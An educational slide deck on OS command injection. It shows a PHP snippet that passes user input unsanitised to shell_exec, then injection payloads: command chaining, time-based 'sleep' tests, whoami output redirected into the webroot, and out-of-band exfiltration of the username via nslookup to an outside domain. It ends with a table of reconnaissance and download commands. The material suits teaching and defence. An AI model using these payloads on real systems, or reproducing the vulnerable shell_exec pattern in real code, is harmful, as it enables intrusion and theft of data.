Injection Attacks: The Complete 2020 Guide

OS Command Injections

What are OS Command Injections?

OS command injections allow attackers to execute operating system commands on the server that is running an application.

Potential Impact of OS Command Injections

  1. Local network infiltration
  2. Access to sensitive data
  3. Upload or download of data, malware
  4. Creating custom scripts on the victim server
  5. Running those scripts or other apps as an admin
  6. Editing user security levels and permissions

When are these injections possible?

When unsafe user-supplied data is allowed to be injected in a system shell from the application

What is a shell?

Shell is simply an interactive command language that also doubles up as a scripting language

What OS Command Injections Look Like

<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>

What OS Command Injections Look Like

<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>
rm <filename> <-- delete files or directories

What OS Command Injections Look Like

<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>
rm <filename> <-- delete files or directories
# OS command injection example
rm old_file.txt; pwd 
# OS command injection example
rm old_file.txt; pwd 

pwd outputs the full pathname of the current working directory

# Unix-based systems
;

# Windows & Unix-based systems
&

Blind OS Command Injections

Blind OS Command Injections

  1. Time-based attacks
  2. Redirecting output

Time-based attacks

rm old_file.txt; pwd; sleep 5

Time-based attacks

Time-based attacks add a delay to the expected response, on purpose, to verify whether the application is vulnerable

rm old_file.txt; pwd; sleep 5

Redirecting Output

& whoami > /var/www/static/whoami.txt &

Redirecting Output

& whoami > /var/www/static/whoami.txt &

https://vulnerable-website.com/whoami.txt

Out-of-band Attacks

& nslookup https://cybr.com &

Out-of-band Attacks

& nslookup https://cybr.com &
; nslookup `whoami`.cybr.com ;

Out-of-band Attacks

& nslookup https://cybr.com &
; nslookup `whoami`.cybr.com ;

www-data.cybr.com

Useful commands

Source: Cybr & Portswigger

Purpose of command Linux Windows
Name of current user whoami whoami
Operating system uname -a ver
Network configuration ifconfig ifconfig /all
Network connections netstat -an netstat -an
Running processes ps -ef tasklist
Identify the location (and existence) of executables which where
Download file wget (new-object System.Net.WebClient).DownloadFile($url, $path)
Sleep/timeout sleep Use ping or timeout in batch file
Current directory pwd dir
Made with Slides.com